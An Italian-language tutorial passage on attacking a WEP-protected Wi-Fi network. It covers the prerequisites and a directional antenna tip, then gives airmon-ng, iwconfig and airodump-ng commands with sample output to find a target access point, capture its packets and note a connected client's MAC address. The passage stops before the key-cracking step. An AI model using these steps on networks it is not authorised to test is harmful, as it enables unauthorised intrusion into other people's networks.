Decisa la rete wireless target, per lanciare l'attacco che descriverò è necessario che:
- vi sia almeno un client connesso all'access point; esistono metodologie per il cracking di reti senza client connessi: se interessati, rimando, al riguardo, al sito di aircrack-ng;
- i segnali abbiano potenza sufficiente da poter (ricevere e) trasmettere dati. È da valutare la possibilità di costruire un'antenna direttiva adatta; di "moda" sono le antenne dette Pringles, appunto molto direttive e facili da implementare. Nel caso, rimanete attenti all'adattamento di impedenza tra il trasduttore, cioè l'antenna stessa, e la linea di trasmissione, cioè il "filo"; ho visto casi in cui l'adattatore D-LINK è stato inserito direttamente nel tubo di metallo, alla giusta distanza dalle estremità, così da evitare il problema delle riflessioni delle onde elettromagnetiche dovute alla diversa impedenza dell'interfaccia di discontinuità trasduttore/linea!;
- l'algoritmo di cifratura dei dati utilizzato sia il WEP.
Come già accennato in precedenza, individuiamo gli AP non nascosti nelle vicinanze:
airmon-ng start rausb0
airodump-ng rausb0
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1A:11:88:7B:EC 0 16 6 0 11 48 WEP WEP MyHOME
00:0F:B5:56:D9:86 0 6 0 0 2 54. WPA TKIP PSK MYAccessP
[...]
L'AP di nostro interesse sia MyHOME, con BSSID 00:1A:11:88:7B:EC; esso trasmette utilizzando il canale 11 dello standard 802.11 (frequenze nell'intorno dei 2462MHz). La nostra interfaccia di rete wireless, con le adeguate caratteristiche già dette, sia rausb0
.
Al fine di poter utilizzare le tecniche di criptoanalisi contro il WEP, è necessario catturare da qualche migliaio al mezzo milione di pacchetti dati (se la rete non è "affollata", questo porterà via parecchio tempo, per lo meno se non aumentiamo il traffico di rete con gli artifici che vedremo).
Diminuiamo per prima cosa il rate di trasmissione dati ad 1Mbit/s, di modo da diminuire conseguentemente la probabilità di errore.
iwconfig rausb0 rate 1M
Utilizziamo ora airodump-ng per catturare i pacchetti scambiati tra l'AP e gli host e salvarli conseguentemente in file *.cap:
airodump-ng --channel 11 --bssid 00:1A:11:88:7B:EC -w /tmp/dumpfile rausb0
Nel giro di pochi istanti compariranno i client connessi, con il loro indirizzo MAC. Prendiamo nota di uno tra questi; nell'esempio sottostante non abbiamo una così vasta scelta, e scegliamo (chi mai l'avrebbe detto..) la station 00:2F:03:A3:6F:3C.
CH 11 ][ Elapsed: 52 s ][ BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1A:11:88:7B:EC 0 100 503 163 4 11 48 WEP WEP MyHOME BSSID STATION PWR Rate Lost Packets Probes 00:1A:11:88:7B:EC 00:2F:03:A3:6F:3C 0 0- 0 0 206
Il programma visualizza client ed access point che si scambiano frame (non sappiamo ovviamente leggerne il contenuto). La velocità (unità per secondo) con cui vengono catturati questi pacchetti è generalmente piuttosto lenta.